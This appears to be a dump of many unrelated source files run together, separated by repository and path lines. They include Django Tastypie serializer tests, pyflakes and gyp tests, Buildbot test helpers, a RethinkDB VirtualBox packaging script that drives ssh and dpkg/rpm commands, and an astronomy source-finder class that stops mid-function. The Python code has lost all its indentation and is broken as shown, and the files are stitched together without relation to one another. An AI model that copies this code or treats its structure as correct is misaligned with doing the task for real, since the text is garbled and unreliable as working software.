serializer = Serializer()
jsonp = serializer.to_jsonp({'foo': u'Hello \u2028\u2029world!'},
{'callback': 'callback'})
self.assertEqual(jsonp, u'callback({"foo": "Hello \\u2028\\u2029world!"})')
def test_to_plist(self):
if not biplist:
return
serializer = Serializer()
sample_1 = self.get_sample1()
self.assertTrue(serializer.to_plist(sample_1).startswith(b'bplist00bybiplist1.0'))
def test_from_plist(self):
if not biplist:
return
serializer = Serializer()
sample_1 = serializer.from_plist(b'bplist00bybiplist1.0\x00\xd4\x01\x02\x03\x04\x05\x06\x07\x08WsnowmanSageTname[date_joineda&\x03\x10\x1bf\x00D\x00a\x00n\x00i\x00e\x00lZ2010-03-27\x15\x1e&*/;>@M\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X')
self.assertEqual(len(sample_1), 4)
self.assertEqual(sample_1[b'name'], 'Daniel')
self.assertEqual(sample_1[b'age'], 27)
self.assertEqual(sample_1[b'date_joined'], b'2010-03-27')
self.assertEqual(sample_1[b'snowman'], u'☃')
class ResourceSerializationTestCase(TestCase):
fixtures = ['note_testdata.json']
def setUp(self):
super(ResourceSerializationTestCase, self).setUp()
self.resource = NoteResource()
base_bundle = Bundle()
self.obj_list = [self.resource.full_dehydrate(self.resource.build_bundle(obj=obj)) for obj in self.resource.obj_get_list(base_bundle)]
self.another_resource = AnotherNoteResource()
self.another_obj_list = [self.another_resource.full_dehydrate(self.resource.build_bundle(obj=obj)) for obj in self.another_resource.obj_get_list(base_bundle)]
def test_to_xml_multirepr(self):
serializer = Serializer()
binary_xml = serializer.to_xml(self.obj_list)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<objects><object><content>This is my very first post using my shiny new API. Pretty sweet, huh?</content><created>2010-03-30T20:05:00</created><id type="integer">1</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>first-post</slug><title>First Post!</title><updated>2010-03-30T20:05:00</updated></object><object><content>The dog ate my cat today. He looks seriously uncomfortable.</content><created>2010-03-31T20:05:00</created><id type="integer">2</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>another-post</slug><title>Another Post</title><updated>2010-03-31T20:05:00</updated></object><object><content>My neighborhood\'s been kinda weird lately, especially after the lava flow took out the corner store. Granny can hardly outrun the magma with her walker.</content><created>2010-04-01T20:05:00</created><id type="integer">4</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>recent-volcanic-activity</slug><title>Recent Volcanic Activity.</title><updated>2010-04-01T20:05:00</updated></object><object><content>Man, the second eruption came on fast. Granny didn\'t have a chance. On the upshot, I was able to save her walker and I got a cool shawl out of the deal!</content><created>2010-04-02T10:05:00</created><id type="integer">6</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>grannys-gone</slug><title>Granny\'s Gone</title><updated>2010-04-02T10:05:00</updated></object></objects>')
def test_to_xml_single(self):
serializer = Serializer()
resource = self.obj_list[0]
binary_xml = serializer.to_xml(resource)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<object><content>This is my very first post using my shiny new API. Pretty sweet, huh?</content><created>2010-03-30T20:05:00</created><id type="integer">1</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>first-post</slug><title>First Post!</title><updated>2010-03-30T20:05:00</updated></object>')
def test_to_xml_nested(self):
serializer = Serializer()
resource = self.obj_list[0]
data = {
'stuff': {
'foo': 'bar',
'object': resource,
}
}
binary_xml = serializer.to_xml(data)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><stuff type="hash"><foo>bar</foo><object><content>This is my very first post using my shiny new API. Pretty sweet, huh?</content><created>2010-03-30T20:05:00</created><id type="integer">1</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>first-post</slug><title>First Post!</title><updated>2010-03-30T20:05:00</updated></object></stuff></response>')
def test_to_json_multirepr(self):
serializer = Serializer()
self.assertEqual(serializer.to_json(self.obj_list), '[{"content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}, {"content": "The dog ate my cat today. He looks seriously uncomfortable.", "created": "2010-03-31T20:05:00", "id": 2, "is_active": true, "resource_uri": "", "slug": "another-post", "title": "Another Post", "updated": "2010-03-31T20:05:00"}, {"content": "My neighborhood\'s been kinda weird lately, especially after the lava flow took out the corner store. Granny can hardly outrun the magma with her walker.", "created": "2010-04-01T20:05:00", "id": 4, "is_active": true, "resource_uri": "", "slug": "recent-volcanic-activity", "title": "Recent Volcanic Activity.", "updated": "2010-04-01T20:05:00"}, {"content": "Man, the second eruption came on fast. Granny didn\'t have a chance. On the upshot, I was able to save her walker and I got a cool shawl out of the deal!", "created": "2010-04-02T10:05:00", "id": 6, "is_active": true, "resource_uri": "", "slug": "grannys-gone", "title": "Granny\'s Gone", "updated": "2010-04-02T10:05:00"}]')
def test_to_json_single(self):
serializer = Serializer()
resource = self.obj_list[0]
self.assertEqual(serializer.to_json(resource), '{"content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}')
def test_to_json_decimal_list_dict(self):
serializer = Serializer()
resource = self.another_obj_list[0]
self.assertEqual(serializer.to_json(resource), '{"aliases": ["Mr. Smith", "John Doe"], "content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "meta": {"threat": "high"}, "owed": "102.57", "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}')
def test_to_json_nested(self):
serializer = Serializer()
resource = self.obj_list[0]
data = {
'stuff': {
'foo': 'bar',
'object': resource,
}
}
self.assertEqual(serializer.to_json(data), '{"stuff": {"foo": "bar", "object": {"content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}}}')
class StubbedSerializer(Serializer):
def __init__(self, *args, **kwargs):
super(StubbedSerializer, self).__init__(*args, **kwargs)
self.from_json_called = False
self.from_xml_called = False
self.from_yaml_called = False
self.from_html_called = False
self.from_jsonp_called = False
def from_json(self, data):
self.from_json_called = True
return True
def from_xml(self, data):
self.from_xml_called = True
return True
def from_yaml(self, data):
self.from_yaml_called = True
return True
def from_html(self, data):
self.from_html_called = True
return True
def from_jsonp(self, data):
self.from_jsonp_called = True
return True
class ContentHeaderTest(TestCase):
def test_deserialize_json(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'application/json')
self.assertTrue(serializer.from_json_called)
def test_deserialize_json_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'application/json; charset=UTF-8')
self.assertTrue(serializer.from_json_called)
def test_deserialize_xml(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'application/xml')
self.assertTrue(serializer.from_xml_called)
def test_deserialize_xml_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'application/xml; charset=UTF-8')
self.assertTrue(serializer.from_xml_called)
def test_deserialize_yaml(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/yaml')
self.assertTrue(serializer.from_yaml_called)
def test_deserialize_yaml_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/yaml; charset=UTF-8')
self.assertTrue(serializer.from_yaml_called)
def test_deserialize_jsonp(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'text/javascript')
self.assertTrue(serializer.from_jsonp_called)
def test_deserialize_jsonp_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'text/javascript; charset=UTF-8')
self.assertTrue(serializer.from_jsonp_called)
def test_deserialize_html(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/html')
self.assertTrue(serializer.from_html_called)
def test_deserialize_html_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/html; charset=UTF-8')
self.assertTrue(serializer.from_html_called)
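# A minimal sketch of the dispatch exercised by ContentHeaderTest (hypothetical
# payload, not part of the test module): Serializer.deserialize() picks the
# matching from_* method from the supplied Content-Type, ignoring any charset
# parameter.
#
#     serializer = Serializer()
#     data = serializer.deserialize('{"hello": "world"}', 'application/json; charset=UTF-8')
#     # data == {'hello': 'world'}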
|
utkbansal/kuma
|
refs/heads/master
|
vendor/packages/pyflakes/test/test_return_with_arguments_inside_generator.py
|
53
|
from sys import version_info
from pyflakes import messages as m
from pyflakes.test.harness import TestCase, skipIf
class Test(TestCase):
@skipIf(version_info >= (3, 3), 'new in Python 3.3')
def test_return(self):
self.flakes('''
class a:
def b():
for x in a.c:
if x:
yield x
return a
''', m.ReturnWithArgsInsideGenerator)
@skipIf(version_info >= (3, 3), 'new in Python 3.3')
def test_returnNone(self):
self.flakes('''
def a():
yield 12
return None
''', m.ReturnWithArgsInsideGenerator)
@skipIf(version_info >= (3, 3), 'new in Python 3.3')
def test_returnYieldExpression(self):
self.flakes('''
def a():
b = yield a
return b
''', m.ReturnWithArgsInsideGenerator)
|
themiken/mtasa-blue
|
refs/heads/master
|
vendor/google-breakpad/src/tools/gyp/test/mac/gyptest-framework-headers.py
|
344
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that mac_framework_headers works properly.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
# TODO(thakis): Make this work with ninja, make. http://crbug.com/129013
test = TestGyp.TestGyp(formats=['xcode'])
CHDIR = 'framework-headers'
test.run_gyp('test.gyp', chdir=CHDIR)
# Test that headers are installed for frameworks
test.build('test.gyp', 'test_framework_headers_framework', chdir=CHDIR)
test.built_file_must_exist(
'TestFramework.framework/Versions/A/TestFramework', chdir=CHDIR)
test.built_file_must_exist(
'TestFramework.framework/Versions/A/Headers/myframework.h', chdir=CHDIR)
# Test that headers are installed for static libraries.
test.build('test.gyp', 'test_framework_headers_static', chdir=CHDIR)
test.built_file_must_exist('libTestLibrary.a', chdir=CHDIR)
test.built_file_must_exist('include/myframework.h', chdir=CHDIR)
test.pass_test()
|
EazzyLab/blog-scraper
|
refs/heads/master
|
Scraper/sync_http.py
|
1
|
import requests
def get_request(url, headers=None, proxy=None):
r = requests.get(url, headers=headers, proxies=proxy)
return r
|
ChameleonCloud/horizon
|
refs/heads/chameleoncloud/train
|
openstack_dashboard/test/unit/api/rest/test_config.py
|
3
|
# Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard.api.rest import config
from openstack_dashboard.test import helpers as test
class ConfigRestTestCase(test.TestCase):
def test_settings_config_get(self):
request = self.mock_rest_request()
response = config.Settings().get(request)
self.assertStatusCode(response, 200)
self.assertIn(b"REST_API_SETTING_1", response.content)
self.assertIn(b"REST_API_SETTING_2", response.content)
self.assertNotIn(b"REST_API_SECURITY", response.content)
|
pmisik/buildbot
|
refs/heads/master
|
master/buildbot/test/util/connector_component.py
|
5
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import types
from twisted.internet import defer
from buildbot.db import model
from buildbot.test.fake import fakemaster
from buildbot.test.util import db
from buildbot.test.util.misc import TestReactorMixin
class FakeDBConnector:
pass
class ConnectorComponentMixin(TestReactorMixin, db.RealDatabaseMixin):
"""
Implements a mock DBConnector object, replete with a thread pool and a DB
model. This includes a RealDatabaseMixin, so subclasses should not
instantiate that class directly. The connector appears at C{self.db}, and
the component should be attached to it as an attribute.
@ivar db: fake database connector
@ivar db.pool: DB thread pool
@ivar db.model: DB model
"""
@defer.inlineCallbacks
def setUpConnectorComponent(self, table_names=None, basedir='basedir', dialect_name='sqlite'):
        """Set up C{self.db}, using the given table names and basedir."""
        self.setUpTestReactor()
if table_names is None:
table_names = []
yield self.setUpRealDatabase(table_names=table_names, basedir=basedir)
self.db = FakeDBConnector()
self.db.pool = self.db_pool
self.db.master = fakemaster.make_master(self)
self.db.model = model.Model(self.db)
self.db._engine = types.SimpleNamespace(dialect=types.SimpleNamespace(name=dialect_name))
@defer.inlineCallbacks
def tearDownConnectorComponent(self):
yield self.tearDownRealDatabase()
# break some reference loops, just for fun
del self.db.pool
del self.db.model
del self.db
class FakeConnectorComponentMixin(TestReactorMixin):
    # Just like ConnectorComponentMixin, but for working with a fake database
def setUpConnectorComponent(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self, wantDb=True)
self.db = self.master.db
self.db.checkForeignKeys = True
self.insertTestData = self.db.insertTestData
return defer.succeed(None)
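# A minimal usage sketch (hypothetical component and table names, not part of
# this module), following the conventions described in the docstring above:
# a test case mixes in ConnectorComponentMixin, builds the connector in setUp
# and attaches the component under test to self.db.
#
#     class MyComponentTest(ConnectorComponentMixin, unittest.TestCase):
#
#         @defer.inlineCallbacks
#         def setUp(self):
#             yield self.setUpConnectorComponent(table_names=['changes'])
#             self.db.my_component = MyComponent(self.db)
#
#         @defer.inlineCallbacks
#         def tearDown(self):
#             yield self.tearDownConnectorComponent()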
|
tectronics/arsenalsuite
|
refs/heads/master
|
cpp/apps/freezer/build.py
|
7
|
from blur.build import *
import os, sys
path = os.path.dirname(os.path.abspath(__file__))
rev_path = os.path.join(path,'../..')
instPrefix = ""
destDir = ""
if "DESTDIR" in os.environ:
destDir = os.environ["DESTDIR"]
elif sys.platform=='win32':
destDir = "c:/"
if sys.platform=="linux2":
instPrefix = destDir + "/etc/ab/"
else:
instPrefix = destDir + "/arsenalsuite/freezer/"
ini = IniConfigTarget("freezerini",path,'freezer.ini.template','freezer.ini',instPrefix)
kt = KillTarget("freezerkill", path, ["af.exe"])
nsi = NSISTarget("freezer_installer",path,"freezer.nsi")
nsi.pre_deps = ['freezerkill']
# Use Static python modules on windows
deps = None
if sys.platform == 'win32':
deps = ["sipstatic","pystonestatic","pystoneguistatic","pyclassesstatic","pyclassesuistatic","classes","libfreezer","pyfreezerstatic","pyabsubmitstatic",ini]
else:
deps = ["sipstatic","pystone","pystonegui","pyclasses","pyclassesui","classes","libfreezer","pyfreezer",ini]
QMakeTarget("freezer",path,"freezer.pro",deps,[nsi])
#if sys.platform=="linux2":
# rpm = RPMTarget('freezerrpm','freezer',path,'../../../rpm/spec/freezer.spec.template','1.0')
if __name__ == "__main__":
build()
|
xfournet/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyAnnotateVariableTypeIntentionTest/notSuggestedForComprehensionTarget.py
|
19
|
[v<caret>ar for var in range(10)]
|
kool79/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyTypeCheckerInspection/StringStartsWith.py
|
49
|
'foo'.startswith('bar')
'foo'.startswith(('bar', 'baz'))
'foo'.startswith(<warning descr="Expected type 'Union[str, unicode, tuple]', got 'int' instead">2</warning>)
u'foo'.startswith(u'bar')
u'foo'.startswith((u'bar', u'baz'))
u'foo'.startswith(<warning descr="Expected type 'Union[str, unicode, tuple]', got 'int' instead">2</warning>)
|
elkingtonmcb/rethinkdb
|
refs/heads/next
|
scripts/VirtuaBuild/vm_build.py
|
46
|
# Copyright 2010-2012 RethinkDB, all rights reserved.
import os
import socket
import time
# The Refspec classes below form a pythonic discriminated union; the empty
# base class is not strictly needed and mostly serves as documentation that
# happens to be runnable code.
class RunError(Exception):
def __init__(self, str):
self.str = str
def __str__(self):
return repr(self.str)
def ensure_socket(host, port):
start_time = time.time()
success = False
    while (time.time() - start_time < 5 * 60): # give up after five minutes
try:
s = socket.create_connection((host, port))
success = True
break
        except:
            time.sleep(20)
if not success:
raise RunError("Failed to create a connection.")
return s
class Refspec():
pass
class Tag(Refspec):
def __init__(self, tagname):
self.val = tagname
class Branch(Refspec):
def __init__(self, branchname):
self.val = branchname
def remove_local(string):
    if string.endswith('.local'):
        return string[:-len('.local')]
    else:
        return string
def rpm_install(path):
return "rpm -i %s" % path
def rpm_get_binary(path):
return "rpm -qpil %s | grep /usr/bin" % path
def rpm_uninstall(cmd_name):
return "which %s | xargs readlink -f | xargs rpm -qf | xargs rpm -e" % cmd_name
def deb_install(path):
return "dpkg -i %s" % path
def deb_get_binary(path):
return "dpkg -c %s | grep /usr/bin/rethinkdb-.* | sed 's/^.*\(\/usr.*\)$/\\1/'" % path
def deb_uninstall(cmd_name):
return "which %s | xargs readlink -f | xargs dpkg -S | sed 's/^\(.*\):.*$/\\1/' | xargs dpkg -r" % cmd_name
class VM():
def __init__(self, uuid, hostname, username = 'rethinkdb', rootname = 'root', vbox_username = 'rethinkdb', vbox_hostname = 'deadshot', startup = True):
self.uuid = uuid
self.hostname = hostname
self.username = username
self.rootname = rootname
self.vbox_username = vbox_username
self.vbox_hostname = vbox_hostname
if (startup):
os.system("ssh %s@%s VBoxManage startvm %s --type headless" % (self.vbox_username, self.vbox_hostname, self.uuid))
start_time = time.time()
            while (self.command("true") != 0) and time.time() - start_time < 5 * 60: # give up after five minutes
time.sleep(3)
if self.command("true") != 0:
raise RunError("Failed to connect to Virtual Machine %s." % uuid)
def __del__(self):
os.system("ssh %s@%s VBoxManage controlvm %s poweroff" % (self.vbox_username, self.vbox_hostname, self.uuid))
def command(self, cmd_str, root = False, bg = False):
str = "ssh -o ConnectTimeout=1000 %s@%s \"%s\"" % ((self.rootname if root else self.username), self.hostname, (cmd_str + ("&" if bg else ""))) + ("&" if bg else "")
print str
return os.system(str)
# send a file into the tmp directory of the vm
def copy_to_tmp(self, path):
str = "scp %s %s@%s:/tmp/" % (path, self.username, self.hostname)
assert(os.system(str) == 0)
def popen(self, cmd_str, mode):
#print cmd_str
return os.popen("ssh %s@%s \"%s\"" % (self.username, self.hostname, cmd_str), mode)
class target():
def __init__(self, build_uuid, build_hostname, username, build_cl, res_ext, install_cl_f, uninstall_cl_f, get_binary_f, vbox_username, vbox_hostname):
self.build_uuid = build_uuid
self.build_hostname = build_hostname
self.username = username
self.build_cl = build_cl
self.res_ext = res_ext
self.install_cl_f = install_cl_f # path -> install cmd
self.uninstall_cl_f = uninstall_cl_f
self.get_binary_f = get_binary_f
self.vbox_username = vbox_username # username and hostname for running VirtualBox through ssh
self.vbox_hostname = vbox_hostname
def start_vm(self):
return VM(self.build_uuid, self.build_hostname, self.username, vbox_username=self.vbox_username, vbox_hostname=self.vbox_hostname) # startup = True
def get_vm(self):
return VM(self.build_uuid, self.build_hostname, self.username, vbox_username=self.vbox_username, vbox_hostname=self.vbox_hostname, startup=False)
def interact(self, short_name):
build_vm = self.start_vm()
print "%s is now accessible via ssh at %s@%s" % (short_name, self.username, self.build_hostname)
print "Leave this process running in the background and when you're done interrupt it to clean up the virtual machine."
while True:
time.sleep(1)
def run(self, refspec, short_name):
def purge_installed_packages():
old_binaries_raw = build_vm.popen("ls /usr/bin/rethinkdb*", "r").readlines()
old_binaries = map(lambda x: x.strip('\n'), old_binaries_raw)
print "Binaries scheduled for removal: ", old_binaries
for old_binary in old_binaries:
build_vm.command(self.uninstall_cl_f(old_binary), True)
if (not os.path.exists("Built_Packages")):
os.mkdir("Built_Packages")
build_vm = self.start_vm()
def run_checked(cmd, root = False, bg = False):
res = build_vm.command(cmd, root, bg)
if res != 0:
                raise RunError(cmd + " exited with non-zero status %d." % res)
def run_unchecked(cmd, root = False, bg = False):
res = build_vm.command(cmd, root, bg)
if isinstance(refspec, Tag):
run_checked("cd rethinkdb && git fetch && git fetch origin tag %s && git checkout -f %s" % (refspec.val, refspec.val))
elif isinstance(refspec, Branch):
run_checked("cd rethinkdb && git fetch && git checkout -f %s && git pull" % refspec.val)
else:
raise RunError("Invalid refspec type, must be branch or tag.")
run_checked("cd rethinkdb/src &&" + self.build_cl)
dir = build_vm.popen("pwd", 'r').readline().strip('\n')
p = build_vm.popen("find rethinkdb/build/packages -regex .*\\\\\\\\.%s" % self.res_ext, 'r')
raw = p.readlines()
res_paths = map((lambda x: os.path.join(dir, x.strip('\n'))), raw)
print res_paths
dest = os.path.abspath("Built_Packages")
for path in res_paths:
purge_installed_packages()
if (not os.path.exists(os.path.join(dest, short_name))):
os.mkdir(os.path.join(dest, short_name))
# install antiquated packages here
# if os.path.exists('old_versions'):
# for old_version in os.listdir('old_versions'):
# pkg = os.listdir(os.path.join('old_versions', old_version, short_name))[0]
# build_vm.copy_to_tmp(os.path.join('old_versions', old_version, short_name, pkg))
# run_checked(self.install_cl_f(os.path.join('/tmp', pkg)), True)
# print "Installed: ", old_version
# install current versions
target_binary_name = build_vm.popen(self.get_binary_f(path), "r").readlines()[0].strip('\n')
print "Target binary name: ", target_binary_name
run_checked(self.install_cl_f(path), True)
# run smoke test
run_unchecked("rm -r test_data")
run_checked("rethinkdb --cluster-port 11211 --directory test_data", bg = True)
print "Starting tests..."
s = ensure_socket(build_vm.hostname, 11213)
from smoke_install_test import test_against
if (not test_against(build_vm.hostname, 11213)):
raise RunError("Tests failed")
s.send("rethinkdb shutdown\r\n")
scp_string = "scp %s@%s:%s %s" % (self.username, self.build_hostname, path, os.path.join(dest, short_name))
print scp_string
os.system(scp_string)
# the code below is not updated
# find legacy binaries
# leg_binaries_raw = build_vm.popen("ls /usr/bin/rethinkdb*", "r").readlines()
# leg_binaries = map(lambda x: x.strip('\n'), leg_binaries_raw)
# leg_binaries.remove('/usr/bin/rethinkdb') #remove the symbolic link
# leg_binaries.remove(target_binary_name)
# for leg_binary in leg_binaries:
# print "Testing migration %s --> %s..." % (leg_binary, target_binary_name)
# file_name = leg_binary.replace('/', '_').replace('-','_').replace('.', '_')
# # create the old data
# run_unchecked("rm %s_1 %s_2" % (file_name, file_name))
# run_checked("%s -p 11211 -f %s_1 -f %s_2" % (leg_binary, file_name, file_name), bg = True)
# s = ensure_socket(build_vm.hostname, 11211)
# from smoke_install_test import throw_migration_data
# throw_migration_data(build_vm.hostname, 11211)
# s.send("rethinkdb shutdown\r\n")
# # run migration
# run_unchecked("rm %s_mig_1 %s_mig_2 %s_intermediate" % ((file_name, ) * 3))
# run_checked("%s migrate --in -f %s_1 -f %s_2 --out -f %s_mig_1 -f %s_mig_2 --intermediate %s_intermediate" % ((target_binary_name,) + ((file_name,) * 5)))
# # check to see if the data is there
# run_checked("%s -p 11211 -f %s_mig_1 -f %s_mig_2" % (target_binary_name, file_name, file_name), bg = True)
# s = ensure_socket(build_vm.hostname, 11211)
# from smoke_install_test import check_migration_data
# check_migration_data(build_vm.hostname, 11211)
# s.send("rethinkdb shutdown\r\n")
# print "Done"
purge_installed_packages()
    # clean_up is used just to shut down the machine; kind of a hack, but it works
def clean_up(self):
        build_vm = self.get_vm()
        return  # dropping the reference invokes build_vm's __del__ method, which shuts down the machine
def build(targets):
os.mkdir("Built_Packages")
map((lambda x: x.run()), targets)
|
SKIRT/PTS
|
refs/heads/master
|
magic/sources/extended.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.sources.extended Contains the ExtendedSourceFinder class.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import standard modules
import traceback
from collections import OrderedDict
# Import astronomical modules
from astropy.coordinates import Angle
# Import the relevant PTS classes and modules
from ..region.list import PixelRegionList, SkyRegionList
from ..basics.stretch import PixelStretch
from ..region.point import PixelPointRegion
from ..region.ellipse import PixelEllipseRegion, SkyEllipseRegion
from ..core.frame import Frame
from ...core.basics.configurable import Configurable
from ...core.tools import filesystem as fs
from ...core.basics.log import log
from ...core.basics.table import SmartTable
from ..core.mask import Mask
from ..basics.coordinate import SkyCoordinate
# -----------------------------------------------------------------
class ExtendedSourceTable(SmartTable):
"""
This class ...
"""
# Add column info
_column_info = OrderedDict()
_column_info["RA"] = (float, "deg", "right ascension")
_column_info["DEC"] = (float, "deg", "declination")
_column_info["Detected"] = (bool, None, "Has source detected")
_column_info["Flux"] = (float, "Jy", "flux for the point source")
_column_info["Flux error"] = (float, "Jy", "error on the flux value")
# -----------------------------------------------------------------
def __init__(self, *args, **kwargs):
"""
The constructor ...
:param args:
:param kwargs:
"""
# Call the constructor of the base class
super(ExtendedSourceTable, self).__init__(*args, **kwargs)
# Add column info
self.add_all_column_info(self._column_info)
# -----------------------------------------------------------------
def add_source(self, source):
"""
This function ...
:param source:
:return:
"""
if source is not None:
# Inform the user
log.info("Adding source " + str(source.index) + " to the table of extended sources ...")
# Get extended source properties
ra = source.position.ra
dec = source.position.dec
detected = source.has_detection
flux = None
flux_error = None
# Construct the row
values = [ra, dec, detected, flux, flux_error]
else: values = [None, None, None, None, None]
# Add a row
self.add_row(values)
# -----------------------------------------------------------------
def get_position(self, index):
"""
This function ...
:param index:
:return:
"""
return SkyCoordinate(ra=self["RA"][index] * self["RA"].unit, dec=self["DEC"][index] * self["DEC"].unit, unit="deg", frame="fk5")
# -----------------------------------------------------------------
def is_detected(self, index):
"""
This function ...
:param index:
:return:
"""
return self["Detected"][index]
# -----------------------------------------------------------------
def get_flux(self, index):
"""
This function ...
:param index:
:return:
"""
return self.get_quantity("Flux", index)
# -----------------------------------------------------------------
def get_flux_error(self, index):
"""
This function ...
:param index:
:return:
"""
return self.get_quantity("Flux error", index)
# -----------------------------------------------------------------
class ExtendedSourceFinder(Configurable):
"""
This class ...
"""
def __init__(self, *args, **kwargs):
"""
The constructor ...
:param kwargs:
"""
# Call the constructor of the base class
super(ExtendedSourceFinder, self).__init__(*args, **kwargs)
# -- Attributes --
# Initialize the sources list
self.sources = []
# The image frame
self.frame = None
        # The mask covering objects that require special attention (visual feedback)
self.special_mask = None
# The mask covering pixels that should be ignored
self.ignore_mask = None
# The mask of bad pixels
self.bad_mask = None
# The galactic catalog
self.catalog = None
# The region list
self.regions = None
# The segmentation map
self.segments = None
# The extended source table
self.table = None
# -----------------------------------------------------------------
def _run(self, **kwargs):
"""
This function ...
"""
# 2. Load the sources from the catalog
self.load_sources()
# 3. Detect the sources
if not self.config.weak: self.detect_sources()
else: self.set_detections()
# Find apertures
#if self.config.find_apertures: self.find_contours()
# 4. Create the region list
self.create_regions()
# 5. Create the segmentation map
self.create_segments()
# 10. Create the table
self.create_table()
# 6. Write
self.write()
# -----------------------------------------------------------------
def setup(self, **kwargs):
"""
This function ...
:param kwargs:
"""
# Call the setup function of the base class
super(ExtendedSourceFinder, self).setup()
# Inform the user
log.info("Setting up the extended source finder ...")
# Make a local reference to the image frame and catalog
self.frame = kwargs.pop("frame")
self.catalog = kwargs.pop("catalog")
# Masks
self.special_mask = kwargs.pop("special_mask", None)
self.ignore_mask = kwargs.pop("ignore_mask", None)
self.bad_mask = kwargs.pop("bad_mask", None)
# Create an empty frame for the segments
self.segments = Frame.zeros_like(self.frame)
# Initialize the table
self.table = ExtendedSourceTable()
# -----------------------------------------------------------------
def clear(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Clearing the extended source finder ...")
# Create a new list
self.sources = []
# Clear the frame
self.frame = None
# -----------------------------------------------------------------
@property
def principal(self):
"""
This function ...
:return:
"""
for source in self.sources:
if source is None: continue
if source.principal: return source
return None
# -----------------------------------------------------------------
@property
def companions(self):
"""
This function ...
:return:
"""
companions = []
for source in self.sources:
if source is None: continue
if source.companion: companions.append(source)
return companions
# -----------------------------------------------------------------
def load_sources(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Loading the extended sources from the catalog ...")
# Loop over the entries in the catalog
for index in range(len(self.catalog)):
# Get position
position = self.catalog.get_position(index)
# If the source falls outside of the frame, skip it
if not self.frame.contains(position): source = None
else:
# Calculate the pixel position of the galaxy in the frame
pixel_position = position.to_pixel(self.frame.wcs)
# Create a source
source = self.catalog.create_source(index)
# Enable track record if requested
#if self.config.track_record: galaxy.enable_track_record()
# Set attributes based on masks (special and ignore)
if self.special_mask is not None: source.special = self.special_mask.masks(pixel_position)
if self.ignore_mask is not None: source.ignore = self.ignore_mask.masks(pixel_position)
# If the input mask masks this galaxy's position, set to None
if self.bad_mask is not None and self.bad_mask.masks(pixel_position) and not source.principal: source = None
# Add the new source to the list
self.sources.append(source)
# Debug messages
if self.principal is not None:
log.debug(self.principal.name + " is the principal galaxy in the frame")
log.debug("The following galaxies are its companions: " + str(self.principal.companions))
else: log.warning("No principal galaxy found in the frame")
# -----------------------------------------------------------------
def detect_sources(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Detecting the sources in the frame ...")
# Loop over all sources
for source in self.sources:
# Skip None
if source is None: continue
# If this source should be ignored, skip it
if source.ignore: continue
# If the galaxy is the principal galaxy and a region file is given
if source.principal and self.config.principal_region is not None:
